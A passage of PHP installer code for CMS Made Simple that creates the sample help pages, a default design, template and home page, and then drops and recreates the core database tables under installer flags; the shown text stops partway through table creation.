	'<p>Search is a module for searching "core" content along with certain registered modules. You put in a word or two and it gives you back matching, relevant results.</p><p>You can see the search module in use in the default templates, like on this page. Simply put <code>{ldelim}search}</code> in your template, where you want the search form to appear. If you want the results of a search to appear on a different page, you can specify this with the parameter <code>resultpage=\'page alias\'</code>.</p><p>For more information, see the Search module in the Admin Panel, in the Extensions menu.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();


// Module Manager / Modules / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Module Manager');
$contentobj->SetAlias();
$contentobj->SetMenuText('Module Manager');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Modules']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>A client for the ModuleRepository, this module allows you to see what modules are available, the version number, size, and Status/Action (whether it is already installed or not), read the Help and About for each module, letting you install modules from remote sites without the need for FTP\'ing, or unzipping archives. Module XML files are downloaded using SOAP, integrity verified, and then expanded automatically.</p><p>ModuleManager now checks dependencies. When dependencies are set, the module wont install until dependencies are met. Also a new tab is available, that shows newer versions of installed modules.</p><p>In short, this means that you can download and install modules directly from the Admin Panel. Any module that has been released as an XML file can be downloaded and installed. Go to Extensions &raquo; Module Manager in the Admin Panel to see the list of modules from the official CMSMS repository in the CMSMS Development Forge.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();


// Tags / Default Extensions / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Tags');
$contentobj->SetAlias();
$contentobj->SetMenuText('Tags');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Default Extensions']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>There are a number of custom tags included with the default CMS Made Simple installation. They are all described and demonstrated in the following page, and user defined tags are in the next one.</p><p>To use a tag, simply put it in the template or page like this: {ldelim}nameoftag}. Some tags can also take parameters, which are described in the Help that is accessible for each tag in Extensions &raquo; Tags in the Admin Panel.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Tags in the core / Tags / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Tags in the core');
$contentobj->SetAlias('cms_tags');
$contentobj->SetMenuText('Tags in the core');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Tags']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>There are plenty of tags included with the CMSMS core. Some of them are demonstrated here, for any questions as to the parameters they can take or anything else please see the Tags Help.</p><h3>{ldelim}anchor}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}anchor anchor=\'here\' text=\'Scroll Down\' class=\'myclass\' title=\'mytitle\' tabindex=\'1\' accesskey=\'s\'}</code></dd> <dt>Display</dt> <dd>Creates a link to an anchor on the same page. Used for example for the ^Top link at the bottom of this page.</dd> </dl><h3>{ldelim}cms_breadcrumbs{rdelim}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}cms_breadcrumbs root=\'Home\'{rdelim}</code></dd> <dt>Display</dt> <dd>Breadcrumbs are a navigational technique displaying all visited pages leading from the home page to the currently viewed page. You find it under the header on this page.</dd></dl><h3>{ldelim}cms_module}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}cms_module module=\'somemodulename\' param1=\'something\' param2=true}</code></dd> <dt>Display</dt> <dd>This tag is used to insert modules into your templates and pages.  Used for any module that you download. In the default templates, wrapper tags are used for inserting modules though. That is, a tag is made to insert a cms_module tag.</dd> </dl><h3>{ldelim}cms_selflink}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}cms_selflink page="1"}</code> or <code>{ldelim}cms_selflink page="alias"}</code></dd> <dt>Display</dt> <dd>Creates a link to another CMSMS content page inside your template or content. Can also be used for external links with the ext parameter. </dd> <dt>Example</dt> <dd>{cms_selflink page=\'modules\' text=\'Link to the modules page\'} </dd> <dd><a class="external" href="http://www.cmsmadesimple.org">This is an external link to the CMS Made Simple website</a></dd> </dl><h3>{ldelim}cms_version}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}cms_version}</code></dd> <dt>Display</dt> <dd>Displays current version number of CMS Made Simple. </dd> <dt>Example</dt> <dd>See the footer on this page.</dd> </dl><h3>{ldelim}cms_versionname}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}cms_versionname}</code></dd> <dt>Display</dt> <dd>Displays current version name of CMS Made Simple. </dd> <dt>Example</dt> <dd>See the footer on this page.</dd> </dl><h3>{ldelim}current_date}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}current_date format="%A %d-%b-%y %T %Z"}</code></dd> <dt>Display</dt> <dd>Prints the current date and time.</dd> <dt>Example</dt> <dd>{current_date format="%A %d-%b-%y %T %Z"}</dd> </dl><h3>{ldelim}embed}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}embed url="http://www.cmsmadesimple.org"}</code></dd> <dt>Display</dt> <dd>Enable inclusion (embeding) of any other application into the CMS. The most usual use could be a forum. </dd> </dl><h3>{ldelim}global_content}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}global_content name=\'footer\'}</code></dd> <dt>Display</dt> <dd>Inserts a Global Content Block (previously known as HTML blob) into your template or page. The code for the footer of this page is in a Global Content Block. </dd> </dl><h3>{ldelim}menu_text}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}menu_text}</code></dd> <dt>Display</dt> <dd>Prints the menu text of the page.</dd> <dt>Example</dt> <dd>{menu_text}</dd> </dl><h3>{ldelim}modified_date}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}modified_date format="%A %d-%b-%y %T %Z"}</code></dd> <dt>Display</dt> <dd>Prints the date and time the page was last modified. </dd> <dt>Example</dt> <dd>{modified_date format="%A %d-%b-%y %T %Z"}</dd> </dl><h3>{ldelim}print}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}CMSPrinting}</code></dd> <dt>Display</dt> <dd>Creates a link to only the content of the page.</dd> <dt>Example</dt> <dd>{ldelim}CMSPrinting}</dd> </dl><h3>{ldelim}site_mapper}</h3><dl> <dt>Syntax used</dt> <dd><code>{ldelim}site_mapper}</code></dd> <dt>Display</dt> <dd>Prints out a sitemap.</dd> <dt>Example</dt> <dd>{site_mapper}</dd> </dl>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// User Defined Tags / Tags / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('User Defined Tags');
$contentobj->SetAlias();
$contentobj->SetMenuText('User Defined Tags');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Tags']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>One of the little known features of CMS Made Simple is the User Defined tag.  Basically, this allows you to write PHP code inside the Admin Panel.  Use the \'Add User Defined Tag\' button in Extension &raquo; User Defined Tags in the Admin Panel, write some code, and then insert into a template or page with {literal}{newpluginname}{/literal}.  Simple!</p><p>As an example, I\'ve put together a one line plugin/tag that will show your current User Agent information (which browser you\'re using).  The output is right here: <strong>{user_agent}</strong>.</p><p>If you\'re not looking at the source, all that is in the page is {literal}{user_agent}{/literal}.  To see how this code works, edit the user_agent tag in the Extensions &raquo; User Defined Tags page of the admin.</p><p>This is a VERY powerful feature if used right.  Remember, user defined tags do not get cached, therefore, scripts to rotate ad banners and such will work just fine. Note also that tag code has to be written <em>without</em> opening &lt; ? php  and ending  ? &gt; tags.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

?>
<?php
global $admin_user;

//
// Stylesheets
//
# no stylesheets for a no sample content option

//
// Designs
//
$design = new CmsLayoutCollection();
$design->set_name('Default');
$design->set_description('Default design with just the default template.');
$design->set_default(TRUE);
$design->save();
$design->save();

//
// Types
//
$page_template_type = new CmsLayoutTemplateType();
$page_template_type->set_originator(CmsLayoutTemplateType::CORE);
$page_template_type->set_name('page');
$page_template_type->set_dflt_flag(TRUE);
$page_template_type->set_lang_callback('CmsTemplateResource::page_type_lang_callback');
$page_template_type->set_content_callback('CmsTemplateResource::reset_page_type_defaults');
$page_template_type->set_help_callback('CmsTemplateResource::template_help_callback');
$page_template_type->reset_content_to_factory();
$page_template_type->set_content_block_flag(TRUE);
$page_template_type->save();

$gcb_template_type = new CmsLayoutTemplateType();
$gcb_template_type->set_originator(CmsLayoutTemplateType::CORE);
$gcb_template_type->set_name('generic');
$gcb_template_type->set_lang_callback('CmsTemplateResource::generic_type_lang_callback');
$gcb_template_type->set_help_callback('CmsTemplateResource::template_help_callback');
$gcb_template_type->save();

//
// Template Categories
//

//
// Templates
//
$app = \__appbase\get_app();

$fn = $app->get_destdir()
    . DIRECTORY_SEPARATOR . 'admin'
    . DIRECTORY_SEPARATOR . 'templates'
    . DIRECTORY_SEPARATOR . 'orig_page_template.tpl';

$txt = file_get_contents($fn);
$template = new CmsLayoutTemplate();
$template->set_name('Default');
$template->set_description('This is the default minimal template. A simple starting point to build templates from.');
$template->set_type($page_template_type);
$template->set_content($txt);
$template->set_type($page_template_type);
$template->set_type_dflt(TRUE);
$template->add_design($design);
$template->set_owner(1);
$template->save();

//
// Extra global templates
//

#

//
// Default Content Object
//
ContentOperations::get_instance()->LoadContentType('content');
$content = new Content;
$content->SetName('Home');
$content->SetAlias();
$content->SetOwner(1);
$content->SetMenuText('Home Page');
$content->SetTemplateId($template->get_id());
$content->SetParentId(-1);
$content->SetActive(TRUE);
$content->SetShowInMenu(TRUE);
$content->SetCachable(TRUE);
$content->SetDefaultContent(TRUE);
$content->SetPropertyValue('searchable',1);
$content->SetPropertyValue('design_id',$design->get_id());
$content->SetPropertyValue('content_en',
			   '<p>Congratulations! The installation worked. You now have a fully functional installation of CMS Made Simple and you are <em>almost</em> ready to start building your site.</p><p>If you chose to install the default content, you will see numerous pages available to read.  You should read them thoroughly  as these default pages are devoted to showing you the basics of how to begin working with CMS Made Simple.  On these example pages, templates, and stylesheets many of the features of the default installation of CMS Made Simple are described and demonstrated. You can learn much about the power of CMS Made Simple by absorbing this information.</p><p>To get to the Administration Console you have to login as the administrator (with the username/password you specified during the installation process) on your site at http://yourwebsite.com/cmsmspath/admin.  If this is your site click <a title="CMSMS Demo Admin Panel" href="admin">here</a> to login.</p><p>Read about how to use CMS Made Simple in the <a class="external" href="http://docs.cmsmadesimple.org/" title="CMS Made Simple Documentation" target="_blank">documentation</a>. In case you need any help the community is always at your service, in the  <a class="external" href="http://forum.cmsmadesimple.org" title="CMS Made Simple Forum" target="_blank">forum</a> or the <a class="external" href="http://www.cmsmadesimple.org/support/irc" title="Information about the CMS Made Simple IRC channel" target="_blank">IRC</a>.</p><h3>License</h3><p>CMS Made Simple is released under the <a class="external" href="http://www.gnu.org/licenses/licenses.html#GPL" title="General Public License" target="_blank">GPL</a> license and as such you don\'t have to leave a link back to us in these templates or on your site as much as we would like it.</p><p>Some third party addon modules may include additional license restrictions.</p>');
$content->Save();
?>
<?php

if (isset($CMS_INSTALL_DROP_TABLES)) {

 status_msg(ilang('install_dropping_tables'));
 $db->DropSequence(CMS_DB_PREFIX."additional_users_seq");
 $db->DropSequence(CMS_DB_PREFIX."admin_bookmarks_seq");
 $db->DropSequence(CMS_DB_PREFIX."additional_users_seq");
 $db->DropSequence(CMS_DB_PREFIX."content_seq");
 $db->DropSequence(CMS_DB_PREFIX."content_props_seq");
 $db->DropSequence(CMS_DB_PREFIX."events_seq");
 $db->DropSequence(CMS_DB_PREFIX."event_handler_seq");
 $db->DropSequence(CMS_DB_PREFIX."group_perms_seq");
 $db->DropSequence(CMS_DB_PREFIX."groups_seq");
 $db->DropSequence(CMS_DB_PREFIX."module_deps_seq");
 $db->DropSequence(CMS_DB_PREFIX."module_templates_seq");
 $db->DropSequence(CMS_DB_PREFIX."permissions_seq");
 $db->DropSequence(CMS_DB_PREFIX."users_seq");
 $db->DropSequence(CMS_DB_PREFIX."userplugins_seq");

 $dbdict = NewDataDictionary($db);

 $sqlarray = $dbdict->DropIndexSQL("idx_template_id_modified_date");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropIndexSQL(CMS_DB_PREFIX."idx_template_id_modified_date");
 $dbdict->ExecuteSQLArray($sqlarray);

 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."additional_users");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."adminlog");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."admin_bookmarks");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."content");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."content_props");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."events");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."event_handlers");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."group_perms");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL("`".CMS_DB_PREFIX."groups`");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."modules");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."module_deps");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."module_templates");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."permissions");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."siteprefs");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."user_groups");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."userprefs");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."users");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."userplugins");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."version");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."module_smarty_plugins");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX."routes");
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLayoutTemplateType::TABLENAME);
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLayoutTemplateCategory::TABLENAME);
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME);
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLayoutTemplate::ADDUSERSTABLE);
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLayoutStylesheet::TABLENAME);
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::TABLENAME);
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::TPLTABLE);
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::CSSTABLE);
 $dbdict->ExecuteSQLArray($sqlarray);
 $sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.CmsLock::LOCK_TABLE);
 $dbdict->ExecuteSQLArray($sqlarray);
}

if (isset($CMS_INSTALL_CREATE_TABLES)) {

 status_msg(ilang('install_createtablesindexes'));
 if ($db->dbtype == 'mysql' || $db->dbtype == 'mysqli') {
	@$db->Execute("ALTER DATABASE `" . $db->database . "` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci");
 }

 $dbdict = NewDataDictionary($db);
 $taboptarray = array('mysql' => 'ENGINE MyISAM CHARACTER SET utf8 COLLATE utf8_general_ci', 'mysqli' => 'ENGINE MyISAM CHARACTER SET utf8 COLLATE utf8_general_ci');

	$flds = "
		additional_users_id I KEY,
		user_id I,
		page_id I,
		content_id I
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."additional_users", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'additional_users', $ado_ret));



	$flds = "
		bookmark_id I KEY,
		user_id I,
		title C(255),
		url C(255)
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."admin_bookmarks", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'admin_bookmarks', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_admin_bookmarks_by_user_id', CMS_DB_PREFIX."admin_bookmarks", 'user_id');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'admin_bookmarks', $ado_ret));


	$flds = "
		timestamp I,
		user_id I,
		username C(25),
		item_id I,
		item_name C(50),
		action C(255),
		ip_addr C(40)
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."adminlog", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	if( $return == 2 )
	 {
		$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_adminlog1',CMS_DB_PREFIX."adminlog",'timestamp');
		$return = $dbdict->ExecuteSQLArray($sqlarray);
	 }
	verbose_msg(ilang('install_created_table', 'adminlog', $ado_ret));

	$flds = "
		content_id I KEY,
		content_name C(255),
		type C(25),
		owner_id I,
		parent_id I,
		template_id I,
		item_order I,
		hierarchy C(255),
		default_content I1,
		menu_text C(255),
		content_alias C(255),
		show_in_menu I1,
		active I1,
		cachable I1,
		id_hierarchy C(255),
		hierarchy_path X,
		prop_names X,
		metadata X,
		titleattribute C(255),
		tabindex C(10),
		accesskey C(5),
		last_modified_by I,
		create_date DT,
		modified_date DT,
		secure I1,
		page_url C(255)
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."content", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'content', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_content_by_alias_active', CMS_DB_PREFIX."content", 'content_alias, active');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_content_by_alias_active', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_content_default_content', CMS_DB_PREFIX."content", 'default_content');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_content_default_content', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_content_by_parent_id', CMS_DB_PREFIX."content", 'parent_id');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_content_by_parent_id', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_content_by_hier', CMS_DB_PREFIX."content", 'hierarchy');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_content_by_hier', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_content_by_idhier', CMS_DB_PREFIX."content", 'content_id, hierarchy');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_content_by_idhier', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_content_by_modified', CMS_DB_PREFIX."content", 'modified_date');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_content_by_modified', $ado_ret));

	$flds = "
		content_id I,
		type C(25),
		prop_name C(255),
		param1 C(255),
		param2 C(255),
		param3 C(255),
		content X2,
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."content_props", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'content_props', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_content_props_by_content', CMS_DB_PREFIX."content_props", 'content_id');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_content_props_by_content', $ado_ret));

	$flds = "
		event_id I,
		tag_name C(255),
		module_name C(160),
		removable I,
		handler_order I,
		handler_id I KEY
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."event_handlers", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'event_handlers', $ado_ret));



	$flds = "
		originator C(200) NOTNULL,
		event_name C(200) NOTNULL,
		event_id I KEY
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."events", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'events', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'originator', CMS_DB_PREFIX."events", 'originator');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'originator', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'event_name', CMS_DB_PREFIX."events", 'event_name');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'event_name', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'event_id', CMS_DB_PREFIX."events", 'event_id');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'event_id', $ado_ret));

	$flds = "
		group_perm_id I KEY,
		group_id I,
		permission_id I,
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."group_perms", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'group_perms', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_grp_perms_by_grp_id_perm_id', CMS_DB_PREFIX."group_perms", 'group_id, permission_id');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_grp_perms_by_grp_id_perm_id', $ado_ret));

	$flds = "
		group_id I KEY,
		group_name C(25),
		group_desc C(255),
		active I1,
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL("`".CMS_DB_PREFIX."groups`", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'groups', $ado_ret));



	$flds = "
		module_name C(160) KEY,
		status C(255),
		version C(255),
		admin_only I1 DEFAULT 0,
		active I1,
		allow_fe_lazyload I1,
		allow_admin_lazyload I1
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."modules", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'modules', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_modules_by_name', CMS_DB_PREFIX."modules", 'module_name');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_modules_by_name', $ado_ret));



	$flds = "
		parent_module C(25),
		child_module C(25),
		minimum_version C(25),
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."module_deps", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'module_deps', $ado_ret));


	// deprecated
	$flds = "
		module_name C(160),
		template_name C(160),
		content X,
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."module_templates", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'module_templates', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_module_templates_by_module_and_tpl_name', CMS_DB_PREFIX."module_templates", 'module_name, template_name');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_module_templates_by_module_and_tpl_name', $ado_ret));


	$flds = "
		permission_id I KEY,
		permission_name C(255),
		permission_text C(255),
		permission_source C(255),
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."permissions", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'permissions', $ado_ret));


	$flds = "
		sitepref_name C(255) KEY,
		sitepref_value text,
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."siteprefs", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'siteprefs', $ado_ret));



	$flds = "
		group_id I KEY,
		user_id I KEY,
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."user_groups", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'user_groups', $ado_ret));


	$flds = "
		user_id I KEY,
		preference C(50) KEY,
		value X,
		type C(25)
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."userprefs", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
